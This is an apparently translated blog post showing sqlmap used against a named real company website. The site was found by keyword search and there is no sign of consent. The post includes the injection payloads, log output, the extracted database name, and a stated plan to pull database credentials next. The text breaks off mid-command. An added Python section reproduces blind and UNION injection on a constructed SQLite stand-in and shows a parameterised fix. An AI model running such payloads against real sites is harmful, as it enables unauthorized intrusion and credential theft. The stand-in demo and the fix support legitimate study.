Advanced SQL injection: running against MySQL

This post walks through breaking into a website via SQL injection, using http://www.konzern.com.cn/about/index.php?id=2 as the example, and shows the process of testing with sqlmap and identifying the back-end database.

1. As before, I found the target with a Google keyword search: a site that is a bit harder than the previous ones, http://www.konzern.com.cn/about/index.php?id=2

2. No need to go through the manual testing; just fire up sqlmap.

(1) First, see which database it is. Pointless question, the title already gave it away.


c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0.6.66#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:26

[11:37:26] [INFO] resuming back-end DBMS 'mysql'
[11:37:26] [INFO] testing connection to the target URL
[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4222=4222

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:37:27] [INFO] fetching database names
[11:37:27] [WARNING] the SQL query provided does not return any output
[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:37:27] [INFO] fetching number of databases
[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:37:27] [INFO] retrieved:
[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

[11:37:52] [ERROR] unable to retrieve the number of databases
[11:37:52] [INFO] falling back to current database
[11:37:52] [INFO] fetching current database
available databases [1]:
[*] kg

[11:37:52] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'

[*] shutting down at 11:37:52
The result shows the database is MySQL and the database name is kg, Kevin Durant's initials. Is this developer a basketball fan? Durant went to the Warriors, though; as a man, that choice looks a bit like riding on coattails, but he probably had his reasons: in game seven of this year's Western Conference finals a teammate with nobody within three metres of him didn't dare shoot, and Durant was furious enough to yell.

Two things in the output are worth noting before moving on. sqlmap could not retrieve the number of databases over the slow time-based channel and fell back to the current database ("falling back to current database"), so kg is the database this application connects to, not necessarily the only one on the server. And the line "back-end DBMS: MySQL <= 5.0.11" is not a version banner: it is the version bound attached to the time-based technique that matched (BENCHMARK() is the heavy-query fallback for old MySQL builds without SLEEP()); --banner or -f would fingerprint the real version.
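The following is an added example, not code from the original post or the target site. It reproduces in Python, against a constructed in-memory SQLite stand-in, the two techniques sqlmap reported above that do not depend on MySQL timing functions: boolean-based blind extraction (the `id=1 AND 4222=4222` payload shape) and the two-column UNION query with marker strings (sqlmap sends the markers as hex; 0x7170717071 is the string `qpqpq` and 0x7176766b71 is `qvvkq`, and it cuts the value out of the response between them). The table names `about` and `meta`, the page layout, and the subquery `(SELECT dbname FROM meta)` standing in for MySQL's `DATABASE()` are assumptions; the payloads are written in SQLite syntax (`||` instead of `CONCAT()`, `unicode(substr())` instead of `ORD(MID())`). The BENCHMARK() time-based technique is MySQL-specific and is not reproduced.

```python
import re
import sqlite3

# Constructed stand-in for the site's back end (assumption: a page that runs
# SELECT title, body FROM about WHERE id=<id> with id concatenated unescaped,
# which is the shape of injection sqlmap found).
SECRET_SQ = "(SELECT dbname FROM meta)"  # plays the role of MySQL's DATABASE()


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE about (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO about VALUES (1, 'About us', 'constructed sample row');
        INSERT INTO about VALUES (2, 'History',  'constructed sample row');
        -- SQLite has no DATABASE(); this holds the value we want to recover.
        CREATE TABLE meta (dbname TEXT);
        INSERT INTO meta VALUES ('kg');
    """)
    return conn


def vulnerable_page(conn, id_param: str) -> str:
    """index.php?id=... as the scan implies: id is concatenated, unescaped."""
    sql = "SELECT title, body FROM about WHERE id=" + id_param
    row = conn.execute(sql).fetchone()
    return "<h1>%s</h1><p>%s</p>" % row if row else "<p>no such page</p>"


def fixed_page(conn, id_param: str) -> str:
    """Same page with a typed, parameterised query (the fix)."""
    try:
        id_val = int(id_param)
    except ValueError:
        return "<p>bad request</p>"
    row = conn.execute("SELECT title, body FROM about WHERE id=?", (id_val,)).fetchone()
    return "<h1>%s</h1><p>%s</p>" % row if row else "<p>no such page</p>"


def boolean_blind_extract(page, base_id: str = "2") -> str:
    """Recover SECRET_SQ one character at a time, as sqlmap's
    'AND boolean-based blind' technique does: the page for a true
    condition (id=2 AND 4222=4222) is compared with the page for a false one."""
    truth = page(base_id + " AND 4222=4222")
    if truth == page(base_id + " AND 4222=4223"):
        raise RuntimeError("page does not distinguish true/false; not injectable here")

    def holds(cond: str) -> bool:
        return page(base_id + " AND " + cond) == truth

    # Length first, then each character by binary search over printable ASCII
    # (about 7 requests per character instead of up to 95).
    length = next((n for n in range(1, 65) if holds("length(%s)=%d" % (SECRET_SQ, n))), None)
    if length is None:
        raise RuntimeError("could not determine length")
    out = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL equivalent: ORD(MID(DATABASE(),i,1))>mid
            if holds("unicode(substr(%s,%d,1))>%d" % (SECRET_SQ, i, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def union_extract(page) -> str:
    """The 'Generic UNION query (NULL) - 2 columns' technique: a negative id
    empties the real result set so the UNION row is what gets rendered, and the
    marker strings let us cut the value out of the HTML in one request."""
    payload = "-7699 UNION ALL SELECT 'qpqpq'||%s||'qvvkq',NULL-- wfqe" % SECRET_SQ
    m = re.search(r"qpqpq(.*?)qvvkq", page(payload))
    return m.group(1) if m else ""


def demo() -> dict:
    conn = build_db()
    vuln = lambda p: vulnerable_page(conn, p)
    safe = lambda p: fixed_page(conn, p)
    return {
        "blind": boolean_blind_extract(vuln),
        "union": union_extract(vuln),
        # with the fix, true and false conditions produce the same page
        "fixed_blocks_blind": safe("2 AND 4222=4222") == safe("2 AND 4222=4223"),
        "fixed_union": union_extract(safe),
    }


if __name__ == "__main__":
    print(demo())
```

Both techniques recover the same value from the vulnerable page; against the parameterised version the boolean oracle disappears and the UNION markers never reach the response, which is exactly the distinction sqlmap's boolean and UNION checks rely on.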
(2) Since it is MySQL, the next step is to pull the database usernames and passwords.
c:\Python27\sqlmap>s